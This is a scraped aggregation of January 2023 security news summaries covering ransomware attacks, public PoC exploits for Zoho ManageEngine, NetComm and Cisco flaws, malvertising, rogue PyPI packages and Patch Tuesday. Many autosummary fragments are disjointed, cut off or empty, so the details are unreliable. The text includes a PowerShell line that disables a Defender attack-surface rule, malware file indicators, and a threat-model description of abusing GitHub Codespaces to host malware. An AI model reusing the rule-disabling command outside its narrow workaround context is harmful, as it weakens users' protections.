The post Abacus Group acquires two cybersecurity consulting companies appeared first on Help Net Security.
"Autosummary:
Abacus Group will acquire a comprehensive set of information security capabilities to provide clients with real-world, actionable insight, including penetration testing, red teaming, tabletop exercises, risk and compliance gap assessments, and threat hunting services. "Autosummary:
The 40-year-old Russian national, who was arrested in Miami, was charged in a U.S. federal court with "conducting a money transmitting business that transported and transmitted illicit funds and that failed to meet U.S. regulatory safeguards, including anti-money laundering requirements," the DoJ said. "US CISA added the vulnerability CVE-2022-44877 in CentOS Control Web Panel utility to its Known Exploited Vulnerabilities Catalog. The US CISA added the Centos Web Panel 7 unauthenticated remote code execution flaw (CVE-2022-44877) to its Known Exploited Vulnerabilities Catalog. The flaw impacts the software before 0.9.8.1147, it was addressed with the release of 0.9.8.1147 version on October 25, […]
The post US CISA adds Centos Web Panel RCE CVE-2022-44877 to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
[adrotate banner=”12″] Pierluigi Paganini (SecurityAffairs – hacking, CISA) [adrotate banner=”5″] [adrotate banner=”13″] Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
" CVE-2022-47966 PoC exploit (Horizon3) Horizon3 has previously released exploit code for other critical security flaws in several different products, including: CVE-2022-28219, a critical flaw in Zoho ManageEngine ADAudit Plus that lets attackers compromise Active Directory accounts, CVE-2022-1388, a critical vulnerability allowing remote code execution in F5 BIG-IP networking devices, and CVE-2022-22972, a critical authentication bypass bug in multiple VMware products that can let threat actors gain admin privileges. "Autosummary:
" Email used in the latest phishing campaign (Avanan) HTML files are popular among phishing actors because they are typically ignored by email security products and thus have higher chances of reaching the target’s inbox. "Autosummary:
Ransomware gang activity per quarter (Chainalysis) Victims won’t pay Despite the multiple extortion tactics employed by ransomware operators - e.g. file encryption, DDoS attacks, threats to leak stolen data or to inform data protection authorities of a breach - a growing number of victims refuse to meet the threat actors’ demands. "Autosummary:
LockBit is a ransomware-as-a-service (RaaS) operation, meaning that other criminals pay to become an affiliate, launching attacks and sharing a percentage of their earnings with the original LockBit gang.I guess if they are hitting so many companies, these LockBit guys must be making a lot of money When the US authorities charged a man in connection with the LockBit ransomware in November 2022, they claimed that it had been deployed against at least 1,000 victims in the United States and around the world, making at least $100 million worth of ransom demands. use hard-to-crack, unique passwords to protect sensitive data and accounts, and enable multi-factor authentication. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Brands, the fast food brand operator of KFC, Pizza Hut, Taco Bell, and The Habit Burger Grill fast-food restaurant chains, has been targeted by a ransomware attack that forced the closure of 300 locations in the United Kingdom. "Autosummary:
XLoader checking the WiFi router model (Kaspersky) XLoader now features 113 hard-coded strings used to detect to specific WiFi router models, and if there"s a match, the malware performs the DNS hijacking step by changing the router"s settings. "Autosummary:
Unlock the device Scroll up/down Simulate a long press event Simulate click at a specific coordinate Set clipboard value to a UI element with specific coordinates value Simulate click on a UI element with a specific text value Set a UI element value to a specific text Apart from the above, a "File Manager" command turns the malware into a file manager, allowing the threat actors to get a list of all files stored in the device and download specific files of their choice. "Autosummary:
"Rather, the impacted API is only able to provide a limited set of customer account data, including name, billing address, email, phone number, date of birth, T-Mobile account number and information such as the number of lines on the account and plan features," T-Mobile said. "Researchers released Proof-of-concept exploit code for remote code execution flaw CVE-2022-47966 impacting multiple Zoho ManageEngine products. The CVE-2022-47966 flaw is an unauthenticated remote code execution vulnerability that impacts multiple Zoho products with SAML SSO enabled in the ManageEngine setup. The issue also impacts products that had the feature enabled in the past. The root cause of […]
The post Experts released PoC exploit for critical Zoho ManageEngine RCE flaw appeared first on Security Affairs.
"Autosummary:
[adrotate banner=”12″] Pierluigi Paganini (SecurityAffairs – hacking, Zoho ManageEngine) [adrotate banner=”5″] [adrotate banner=”13″] Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Hello, is it me you’re looking for? Fraudsters still want to help you fix a computer problem you never had in the first place.
The post Tech support scammers are still at it: Here’s what to look out for in 2023 appeared first on WeLiveSecurity
"Autosummary:
In due course, deceptive ads, bogus pop-ups, fake support websites and attacks involving malicious and malware-like programs emerged, with people’s computer screens showing alerts that attempt to convince them that something is wrong with their machine. Indeed, as the scams became more diversified and sophisticated, they involved a shift where the victim is lured into calling the scammer (often after visiting a dodgy website), rather than scammers cold-calling people in a largely random manner. Some of the newer tactics now also highlighted by the FBI involve these steps: The victim receives an email from a legitimate-looking domain, warning of an imminent and automatic renewal of a technical service (i.e., a warranty) for several hundred dollars. "Autosummary:
"Autosummary:
"In 2022, state-sponsored cyber activity has been drawn into sharp focus, ransomware continued to dominate as the primary threat facing organizations, and there have been several highly publicized incidents. Beyond the headlines, there have been some interesting shifts in both tools and tactics of cyber adversaries. What can we learn from the past 12 months as we look ahead at the trends that will shape the threat landscape in 2023? State-sponsored activity In 2022, we … More
The post Cybersecurity in 2023: Russian escalation, Chinese espionage, Iranian “hacktivism” appeared first on Help Net Security.
"Autosummary:
Ransomware-as-a-Service will flourish The Ransomware-as-a-Service (RaaS) landscape will continue to be dominated by a handful of organized cybercrime groups operating a limited number of highly active schemes.We also expect that new revelations will emerge of large scale, covert intelligence gathering by Russian state-sponsored threat actors, enabled by the exploitation of cloud environments, internet backbone infrastructure, or pervasive identity management systems. Russian cyber activity will be split between targeting Ukraine and advancing its broader intelligence objectives With no prospect of an immediate end to the conflict in Ukraine, we can expect more conflict-related cyber activity aimed at degrading Ukraine’s critical infrastructure and government services and collecting foreign intelligence useful to the Russian government from entities engaged in the war effort. "Autosummary:
"The FBI has recently warned the public about search engine ads pushing malware diguised as legitimate software – an old tactic that has lately resulted in too many malicious ads served to users searching for software, cracked software, drivers – anything that can be downloaded, really – via Google and Bing. The recent explosion of search engine malvertising Malware peddlers employ a variety of methods to deliver their wares to unsuspecting users: Malicious links or … More
The post Google ads increasingly pointing to malware appeared first on Help Net Security.
"Autosummary:
Some of these campaigns have been going on since late last year, and mostly target users searching to download popular software (e.g., Audacity, Blender 3D, GIMP, Notepad++, Microsoft Teams, Discord, Microsoft OneNote, 7zip, OBS, etc.). "Autosummary:
"Two vulnerabilities (CVE-2022-4873, CVE-2022-4874) found in three NetComm router models could be exploited to achieve remote code execution on vulnerable devices, and there’s a public PoC chaining them, CERT/CC has warned. The good news is that they’ve been fixed by NetComm and the patches have been implemented in new firmware released in November 2022. About CVE-2022-4873 and CVE-2022-4874 CVE-2022-4874 is an authentication bypass flaw and CVE-2022-4873 is a stack based buffer overflow vulnerability that allows … More
The post Vulnerable NetComm routers and a public PoC exploit (CVE-2022-4873, CVE-2022-4874) appeared first on Help Net Security.
"Autosummary:
"A couple of critical vulnerabilities have been discovered in Netcomm rourers, experts warn of their potential exploitation in the wild. The vulnerabilities discovered in the Netcomm routers are a a stack based buffer overflow and an authentication bypass, respectively tracked as CVE-2022-4873 and CVE-2022-4874. Both issues impact the Netcomm router models NF20MESH, NF20, and NL1902 running software versions […]
The post A couple of bugs can be chained to hack Netcomm routers appeared first on Security Affairs.
"Autosummary:
[adrotate banner=”12″] Pierluigi Paganini (SecurityAffairs – hacking, Netcomm) [adrotate banner=”5″] [adrotate banner=”13″] Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
" Alert sent to BoA customers through the banking app Source: Twitter Bank of America customers have been angrily voicing their concerns about the missing transactions, with some reporting that it caused them to dip into negative balances. "Autosummary:
Chainalysis added that, according to its estimations, the crypto exchange "received $206 million from darknet markets, $224.5 million from scams, and $9 million from ransomware attackers. "CircleCI, a big name in the DevOps space, has released an incident report about a data breach it experienced early this month. |
The post CircleCI: Malware stole GitHub OAuth keys, bypassing 2FA appeared first on Malwarebytes Labs.
"Autosummary:
CircleCI made an official announcement of its security breach on January 4 of this year, urging all its clients to rotate "any and all" their secrets—passwords or private keys—stored in CircleCI and review logs for unauthorized access occurring between December 21, 2022, and January 4, 2023. "Autosummary:
"Autosummary:
"In this case, profapi.dll will start recovering the ACLs, but after a second failure, it won"t write the All Application Packages ACLs, causing issues (crashes & registration failures) with packaged apps. "Autosummary:
"33% of companies are not providing any cybersecurity awareness training to users who work remotely, according to Hornetsecurity. The study also revealed that nearly 74% of remote staff have access to critical data, which is creating more risk for companies in the new hybrid working world. Despite the current lack of training and employees feeling ill-equipped, almost 44% of respondents said their organization plans to increase the percentage of employees that work remotely. “The popularity … More
The post Training, endpoint management reduce remote working cybersecurity risks appeared first on Help Net Security.
"Autosummary:
Remote working security issues While companies have adapted to new ways of working, cybersecurity risks linked to remote working, still need to be addressed. "Autosummary:
"If your enterprise is running ManageEngine products that were affected by CVE-2022-47966, check now whether they’ve been updated to a non-vulnerable version because Horizon3’s will be releasing technical details and a PoC exploit this week. GreyNoise has yet to detect in-the-wild exploitation attempts, but you better believe they are coming. “The vulnerability is easy to exploit and a good candidate for attackers to ‘spray and pray’ across the Internet,” vulnerability researcher James Horseman opined. About … More
The post PoC for critical ManageEngine bug to be released, so get patching! (CVE-2022-47966) appeared first on Help Net Security.
"Autosummary:
About CVE-2022-47966 CVE-2022-47966 is an unauthenticated remote code execution vulnerability that has been found by a researcher with Viettel Cyber Security in two dozen ManageEngine products, including Access Manager Plus, ADSelfService Plus, Endpoint DLP, Password Manager Pro, PAM360, ServiceDesk Plus, and others. "Autosummary:
"You can also forward a port manually, label forwarded ports, share forwarded ports with members of your organization, share forwarded ports publicly, and add forwarded ports to the codespace configuration," GitHub explains in its documentation. "Autosummary:
"Researchers discovered three malicious packages that have been uploaded to the Python Package Index (PyPI) repository by Lolip0p group. FortiGuard Labs researchers discovered three malicious PyPI packages (called ‘colorslib’, ‘hxxpslib’, and “libhxxps”) on the PyPI repository that were uploaded by the same actor, Lolip0p. The packages were discovered on January 10, 2023, the packages “colorslib” and […]
The post Fortinet observed three rogue PyPI packages spreading malware appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"During our investigation, on September 26, 2022, we determined that this incident likely resulted in the unauthorized access or acquisition of our data, including some personal information belonging to Nissan customers," reads the notice. "A PoC exploit code for the unauthenticated remote code execution vulnerability CVE-2022-47966 in Zoho ManageEngine will be released soon. The CVE-2022-47966 flaw is an unauthenticated remote code execution vulnerability that impacts multiple Zoho products with SAML SSO enabled in the ManageEngine setup. The issue also impacts products that had the feature enabled in the past. The […]
The post Patch your Zoho ManageEngine instance immediately! PoC Exploit for CVE-2022-47966 will be released soon appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Zoho ManageEngine) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Theoretically, an attacker could run a simple Python web server, upload malicious scripts or malware to their Codespace, open a web server port on their VM, and assign it "public" visibility. "To validate our hypothesis of threat modeling abuse scenario, we ran a Python-based HTTP server on port 8080, forwarded and exposed the port publicly," reads the Trend Micro report. "A ransomware attack against the maritime software supplier DNV impacted approximately 1,000 vessels. About 1,000 vessels have been impacted by a ransomware attack against DNV, one of the major maritime software suppliers. DNV GL provides solutions and services throughout the life cycle of any vessel, from design and engineering to risk assessment and ship management. […]
The post 1,000 ships impacted by a ransomware attack on maritime software supplier DNV appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, maritime) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
CCleaner malicious download pushed via Google ads source: BleepingComputer Several security researchers (mdmck10, MalwareHunterTeam, Will Dormann, Germán Fernández) have uncovered additional URLs hosting malicious downloads impersonating free and open-source software, confirming that luring users through sponsored results on Google search is a more common approach for cybercriminals. This malware collects sensitive data from browsers (credentials, credit card, autocomplete info), details about the system (username, location, hardware, security software available), and cryptocurrency. Malicious downloads for WinRAR, 7-ZIP, VLC in sponsored ads on Google search source: BleepingComputer From a different domain, threat actors provided a malicious version of the CCleaner utility for removing potentially unwanted files and invalid Windows Registry entries. "Categories: Exploits and vulnerabilities Categories: News Tags: Zoho Tags: ManageEngine Tags: PoC Tags: RCE Tags: CVE-2022-47966 Tags: CVE-2022-35405 Tags: SAML Tags: Apache Santuario Proof of Concept code is about to be released for a vulnerability in many ManageEngine products which could enable RCE with SYSTEM privileges. |
The post Update now! Proof of concept code to be released for Zoho ManageEngine vulnerability appeared first on Malwarebytes Labs.
"Autosummary:
In September, 2022, an RCE vulnerability affecting Zoho ManageEngine PAM360 (versions 5500 and earlier), Password Manager Pro (versions 12100 and earlier), and Access Manager Plus (versions 4302 and earlier) were found to be being actively exploited after several PoCs and a Metasploit module for it were made public. "Don’t be the next victim – here"s what to know about some of the most common tricks that scammers use on the payment app
The post Top 10 Venmo scams – and how to stay safe appeared first on WeLiveSecurity
"Autosummary:
How to stay safe on Venmo Venmo offers various security protections for its users, including data encryption, account monitoring, 2FA and account PIN codes.Fake payments If users are trying to sell an item online, such as via Facebook Marketplace, scammers may try to use Venmo to trick them into believing a payment has already been made.Impersonation/money request Fraudsters sometimes impersonate victims’ friends, using info from their public feeds including profile pics, to make payment requests. The story so far Venmo began life back in 2009 as an SMS-based tool which gave its founders a handy way to send each other money, without having to use cash or checks. "Autosummary:
At the moment, BleepingComputer and multiple security researchers have seen malicious ads in Google search results for the following software: 7-Zip Blender 3D Capcut CCleaner Notepad++ OBS Rufus VirtualBox VLC Media Player WinRAR Putty BleepingComputer has shared some of these findings with Google and a company representative told us that the platform’s policies are designed and enforced to prevent brand impersonation. CCleaner malicious download pushed via Google ads source: BleepingComputer Several security researchers (mdmck10, MalwareHunterTeam, Will Dormann, Germán Fernández) have uncovered additional URLs hosting malicious downloads impersonating free and open-source software, confirming that luring users through sponsored results on Google search is a more common approach for cybercriminals. This malware collects sensitive data from browsers (credentials, credit card, autocomplete info), details about the system (username, location, hardware, security software available), and cryptocurrency. Malicious downloads for WinRAR, 7-ZIP, VLC in sponsored ads on Google search source: BleepingComputer From a different domain, threat actors provided a malicious version of the CCleaner utility for removing potentially unwanted files and invalid Windows Registry entries. "Autosummary:
"Autosummary:
"Autosummary:
Unfortunately, we can only see the exact running software version when a specific theme (sunrise) is enabled on the web application” - Censys However, the company could count 1,637 Cacti hosts reachable over the web that were vulnerable to CVE-2022-46169, many of them (465) running version 1.1.38 of the monitoring solution, released in April 2021. "A new Zapata Computing report reveals a deepening commitment from enterprises that points to a maturing industry with widespread, global interest and increased urgency regarding post-quantum cybersecurity threats. The growing interest in quantum is translating into spending, demonstrated by 71% of quantum-adopting enterprises surveyed having current quantum computing budgets of more than $1 million. This finding represents a 2.5X increase over 2021, where only 28% of quantum-adopting respondents indicated that they had a quantum computing … More
The post Post-quantum cybersecurity threats loom large appeared first on Help Net Security.
"Autosummary:
Enterprises get tactical about quantum adoption Enterprises are taking tactical steps to make quantum computing a reality, with respondents noting that they are building new applications (48%), running experiments on quantum hardware or simulators (62%), and experimenting and building proofs of concept (51%). "An international police operation led by Europol led to the arrest of cryptocurrency scammers targeting users all over the world. An international law enforcement operation conducted by authorities from Bulgaria, Cyprus, Germany and Serbia, supported by Europol and Eurojust, has dismantled a cybercrime ring involved in online investment fraud. The European police have supported this […]
The post Europol arrested cryptocurrency scammers that stole millions from victims appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, cryptocurrency) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Avast says some common filenames and locations for BianLian are: C:\Windows\TEMP\mativ.exe C:\Windows\Temp\Areg.exe C:\Users\%username%\Pictures\windows.exe anabolic.exe However, because the malware deletes itself after the file encryption phase, it is unlikely that victims will find those binaries on their systems. "If you’re running the Cacti network monitoring solution and you haven’t updated it since early December, now is the time to do it to foil attackers exploiting a critical command injection flaw (CVE-2022-46169). About Cacti and CVE-2022-46169 Cacti is an open-source front-end app for RRDtool, a system for logging and graphing time series data, i.e., data from sensors and systems that is recorded / collected at regular intervals to create an evolving picture of what … More
The post Cacti servers under attack by attackers exploiting CVE-2022-46169 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Expert discovered that the T95 Android TV box, available for sale on Amazon and AliExpress, came with sophisticated pre-installed malware. Security researcher, Daniel Milisic, discovered that the T95 Android TV box he purchased on Amazon was infected with sophisticated pre-installed malware. This Android TV box model is available on Amazon and AliExpress for as low […]
The post T95 Android TV Box sold on Amazon hides sophisticated malware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On In order to determine if s T95 Android TV Box has been infected, the researcher recommends checking the presence of a folder named: /data/system/Corejava and a file named /data/system/shared_prefs/open_preference.xml ? "Autosummary:
Files "update.exe" drops on the host (Fortinet) Looking a little further, BleepingComputer found that at least one of the dropped processes is used to collect Discord tokens, suggesting that is part of a general information-stealing malware campaign used to steal browser data, authentication tokens, and other data from an infected device. "Antivirus firm Avast released a free decryptor for the BianLian ransomware family that allows victims to recover locked files. Security firm Avast has released a free decryptor for the BianLian ransomware to allow victims of the malware to recover locked files. The BianLian ransomware emerged in August 2022, the malware was employed in attacks against organizations in […]
The post Avast researchers released a free BianLian ransomware decryptor for some variants of the malware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Netlab 360 observed unidentified threat actors using a new backdoor based on the US CIA’s Project Hive malware suite. Researchers from Qihoo Netlab 360 reported that unidentified threat actors using a new backdoor based on the US CIA’s Project Hive malware suite. “Hive provides a covert communications platform for a whole range of CIA malware to send exfiltrated […]
The post Experts spotted a backdoor that borrows code from CIA’s Hive malware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Rebuilding UDE"s IT infrastructure The cyberattack was disclosed by UDE on November 28th, 2022, forcing the university to shut down all email, communications, and IT systems until further notice. "Autosummary:
Horizon3 previously released exploit code for: CVE-2022-28219, a critical vulnerability in Zoho ManageEngine ADAudit Plus that can let attackers compromise Active Directory accounts, CVE-2022-1388, a critical bug that enables remote code execution in F5 BIG-IP networking devices, and CVE-2022-22972, a critical authentication bypass vulnerability in multiple VMware products that lets threat actors gain admin privileges. "Autosummary:
Horizon3 previously released exploit code for: CVE-2022-28219, a critical vulnerability in Zoho ManageEngine ADAudit Plus that can let attackers compromise Active Directory accounts, CVE-2022-1388, a critical bug that enables remote code execution in F5 BIG-IP networking devices, and CVE-2022-22972, a critical authentication bypass vulnerability in multiple VMware products that lets threat actors gain admin privileges. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Google is calling EU cybersecurity founders Google announced that the Google for Startups Growth Academy: Cybersecurity program now accepts applications from EU companies. Rackspace ransomware attack was executed by using previously unknown security exploit The MS Exchange exploit chain recently revealed by Crowdstrike researchers is how the Play ransomware gang breached the Rackspace Hosted Exchange email environment, the company confirmed … More
The post Week in review: ChatGPT as an infosec assistant, Google offers help to EU cybersecurity startups appeared first on Help Net Security.
"Autosummary:
Cisco has acknowledged one critical (CVE-2023-20025) and two medium-severity (CVE-2023-20026, CVE-2023-20045) vulnerabilities affecting some of its Small Business series of routers, but won’t be fixing them as the devices “have entered the end-of-life process.” How to protect yourself from bot-driven account fraud In this Help Net Security video, Nick Rieniets, Field CTO at Kasada, talks about this threat and offers tips on how to protect yourself from bot-driven account fraud. "Categories: News Tags: ransomware Tags: high society Tags: compromise Tags: school Tags: schools Tags: learning Tags: documents Tags: data Tags: leak We take a look at reports of 14 schools being compromised by ransomware group Vice Society. |
The post Multiple schools hit by Vice Society ransomware attack appeared first on Malwarebytes Labs.
"Autosummary:
According to the BBC, the data includes: Passport scans of both pupils and parents which date back to 2011 Contractual offers made to members of staff Headmaster’s pay and student bursary fund recipients Special Educational Needs (SEN) data Other, unnamed confidential documents were seen which belong to a variety of other schools from across all parts of the UK.Impacts from these attacks have ranged from restricted access to networks and data, delayed exams, canceled school days, and unauthorized access to and theft of personal information regarding students and staff…School districts with limited cybersecurity capabilities and constrained resources are often the most vulnerable; however, the opportunistic targeting often seen with cyber criminals can still put school districts with robust cybersecurity programs at risk. Over the past several years, the education sector, especially kindergarten through twelfth grade (K-12) institutions, have been a frequent target of ransomware attacks. "Autosummary:
"Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @DanielGallagher, @PolarToffee, @Seifreed, @billtoulas, @malwareforme, @struppigel, @demonslay335, @Ionut_Ilascu, @FourOctets, @malwrhunterteam, @BleepinComputer, @LawrenceAbrams, @fwosar, @serghei, @pcrisk, @MsftSecIntel, @BrettCallow, @UK_Daniel_Card, @SRMInform, @TGesches, @rapid7, @uuallan, @AShukuhi, and @BushidoToken. "Autosummary:
"Autosummary:
"Autosummary:
After learning of the data theft, the company began alerting customers via email about the incident, warning them to rotate all tokens and secrets if they had logged in between December 21st, 2022, and January 4th, 2023. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Exploit code readily available On January 3, researcher Numan Türle at Gais Cyber Security, who had reported the issue around October last year, published a proof-of-concept (PoC) exploit and a video showing how it works. "Recently patched Fortinet FortiOS SSL-VPN zero-day exploited in attacks against government organizations and government-related targets. Fortinet researchers reported how threat actors exploited the recently patched FortiOS SSL-VPN vulnerability (CVE-2022-42475) in attacks against government organizations and government-related targets. According to Resecurity, a cybersecurity company protecting Fortune 500 globally, the vulnerability was earlier marketed privately by several […]
The post Threat actors target govt networks exploiting Fortinet SSL-VPN CVE-2022-42475 bug appeared first on Security Affairs.
"Autosummary:
Versions range from 6.0.5 to 7.2.1 Models are FG100F, FG101F, FG200D, FG200E, FG201F, FG240D, FG3H0E, FG5H0E, FG6H1E, FG800D, FGT5HD, FGT60F, FGT80F. Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Fortinet) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
In addition, 261 individuals have been questioned in Bulgaria, Cyprus, German and Serbia, with 22 locations searched - including four call centres, two businesses, and 16 residences. "A critical vulnerability in FortiOS SSL-VPN (CVE-2022-42475) that Fortinet has issued patches for in November 2022 has been exploited by attackers to compromise governmental or government-related targets, the company has shared. Fortinet says the attackers have advanced capabilities: they were able to reverse-engineer various parts of FortiOS to help them with the creation of the exploit, and use a Linux-based implant that was custom-made to run on that operating system. They also pointed out that … More
The post FortiOS flaw was exploited to compromise governmental targets (CVE-2022-42475) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
If such a process has "-jar" as an argument the filename passed as an argument should be treated as a JAR file regardless of the file extension or the output of the Linux "file" command." "Autosummary:
"The cyberattack on Royal Mail, Britain’s postal service, is a ransomware attack that was linked to the LockBit ransomware operation. Royal Mail, the British multinational postal service and courier company, this week announced that a “cyber incident” has a severe impact on its operation. The incident only impacted Royal Mail’s international export services, the company said it is temporarily […]
The post LockBit ransomware operation behind the Royal Mail cyberattack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Royal Mail) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
" You can put the ASR rule to Audit Mode using one of the following methods: The fourth option is to set the rule to disabled mode using the following Powershell command: Add-MpPreference -AttackSurfaceReductionRules_Ids 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b -AttackSurfaceReductionRules_Actions Disabled Until the issue is completely fixed and all deleted shortcuts can be restored, Microsoft advised customers to directly launch Office apps using the Office app or the Microsoft 365 app launcher. "Autosummary:
Finally, Tenable discovered CVE-2023-23490, a "high-severity" SQL injection flaw in "Survey Marker," a WordPress plugin used by 3,000 websites for surveys and market research. "Categories: Personal The Internet is kind of like the Wild West when it comes to threats to our privacy and security. But Malwarebytes can help you become the sheriff of your own digital frontier. |
The post 3 ways Malwarebytes helps you browse securely and privately online appeared first on Malwarebytes Labs.
"Autosummary:
Your name, your address, location data, and more, are all being collected, packaged up, and sold to advertisers at any given moment. With the Malwarebytes Premium + Privacy VPN bundle, you get total protection with smart antivirus, faster, safer web browsing, and our next-gen VPN for your online privacy. While no single method is ever 100 percent foolproof, there are some tried and true ways for keeping your data (and device) safe that, if put into practice, will guard you from most of the threats and prying eyes on the Internet. Chrome has the infamously useless "Do Not Track" setting, and anti-phishing engines exist, like Chrome Safe Browsing or Microsoft Defender SmartScreen, but they work with variable levels of success and aren"t enough by themselves. Whether it"s blocking unwanted trackers, securing your personal information, or booting malware off your devices, here are three ways Malwarebytes can help you become the sheriff of your own digital frontier.Blocks malware, viruses, adware, potentially unwanted programs (PUPs), and other threats. "The first Patch Tuesday of the year from Microsoft addresses 98 security vulnerabilities, with 10 classified as critical for Windows. One vulnerability (CVE-2023-21674) in a core section of Windows code is a zero-day that requires immediate attention. And Adobe has returned with a critical update, paired with a few low-profile patches for the Microsoft Edge browser.
We have added the Windows and Adobe updates to our “Patch Now” list, recognizing that this month’s patch deployments will require significant testing and engineering effort. The team at Application Readiness has provided a helpful infographic that outlines the risks associated with each of the updates for this January update cycle.
Autosummary:
They cover the following key components: Microsoft Local Security Authority Server (lsasrv) Microsoft WDAC OLE DB provider (and ODBC driver) for SQL Windows Backup Engine Windows Cryptographic Services Windows Error Reporting (WER) Windows LDAP - Lightweight Directory Access Protocol Generally, this is an update focused on updating the network and local authentication stack with a few fixes to last month’s patch cycle. Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge) Microsoft Windows (both desktop and server) Microsoft Office Microsoft Exchange Server Microsoft Development platforms (NET Core, .NET As all the high-risk changes affect the Microsoft Windows printing subsystem (though we have not seen any published functionality changes), we strongly recommend the following printing-focused testing: Add and remove watermarks when printing. Given the large number of changes included in this January patch cycle, I have broken down the testing scenarios into high risk and standard risk groups: High risk: This January update from Microsoft delivers a significant number of high-risk changes to the system kernel and printing subsystems within Windows. More generally, given the broad nature of this update, we suggest testing the following Windows features and components: Test user-based scenarios that rely upon touchpoint and gesture support. "StrongPity"s backdoor is fitted with various spying features and can record phone calls, collect texts, and gather call logs and contact lists
The post APT group trojanizes Telegram app – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"ThriveDX is launching a road tour across Europe from Jan. 11 to Feb. 23, 2023 to introduce the company’s human factor security solutions to Exclusive Networks’ ecosystem of more than 25,000 partners and to address the cybersecurity talent shortage, skills gap and lack of diversity and inclusion in the industry. In October 2022, ThriveDX and Exclusive Networks announced their strategic partnership, following Exclusive Networks’ participation as a founding partner in the ThriveDX Cyber Talent Hub. … More
The post ThriveDX and Exclusive Networks address the cybersecurity talent shortage in Europe appeared first on Help Net Security.
"Autosummary:
"Autosummary:
According to the email, data accessed includes: names addresses dates of birth National Insurance numbers bank account details "Autosummary:
"Personal employee or customer data accounted for nearly 45% of all data stolen between July 2021 and June 2022, while companies’ source code and proprietary information accounted for a further 6.7% and 5.6% respectively, according to Imperva. More positively, the research found that theft of credit card information and password details dropped by 64% compared to 2021. “It’s very encouraging to see such a decline in stolen credit card data and passwords. It suggests that … More
The post 6 oversights that enable data breaches appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Cisco has acknowledged one critical (CVE-2023-20025) and two medium-severity (CVE-2023-20026, CVE-2023-20045) vulnerabilities affecting some of its Small Business series of routers, but won’t be fixing them as the devices “have entered the end-of-life process.” Proof-of-concept exploit code for CVE-2023-20025 and CVE-2023-20026 is available online, but there is currently no indication of any of these flaws being exploited by attackers. About the vulnerabilities CVE-2023-20025 is an authentication bypass vulnerability in the web-based management interface of Cisco … More
The post Cisco won’t fix router flaws even though PoC exploit is available (CVE-2023-20025, CVE-2023-20026) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Instead, we should focus on those that pose a real risk based on the threat landscape and the organizational context The concept of risk-based vulnerability management The objective is to focus on the most critical assets and the assets having a higher risk to be targeted by threat actors.Thanks to the risk scoring given per vulnerability, which can be matched with threat intelligence criteria like "easily exploitable", "exploited in wild" or "widely exploited" for instance, prioritizing remediation effectively is much easier. Five key steps to implement a risk-based vulnerability management program Identification: Identify all your assets to discover your attack surface: a discovery scan can help having a first overview. "Twitter said that its investigation revealed that users’ data offered for sale online was not obtained from its systems. Twitter provided an update on its investigation launched after data of 200 Million users were offered for sale online. The company has found “no evidence” that the data were obtained by hacking into its systems. Below […]
The post Twitter: 200M dataset was not obtained through the exploitation of flaws in its systems appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Twitter) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Bank account details (BSB, account name, and number) Superannuation details Government-issued identity information Driver"s license details Passport details Tax File numbers Birth, death, and marriage certificates In addition to the above, because the hackers accessed the agency"s email system, which remains offline, they may also have accessed or stolen sensitive email communications. "Autosummary:
"The discovered Windows sample attributed to the attacker displayed artifacts of having been compiled on a machine in the UTC+8 timezone, which includes Australia, China, Russia, Singapore, and other Eastern Asian countries. "Categories: News Tags: royal mail Tags: cyber attack Tags: post Tags: disruption We take a look at reports that Royal Mail is experiencing severe issues due to an unnamed cyberattack. |
The post Cyberattack halts Royal Mail"s overseas post appeared first on Malwarebytes Labs.
"Autosummary:
" Hunting for clues The attack is being investigated by third parties, but there’s no word currently with regard to how quickly the services will be back online. "Autosummary:
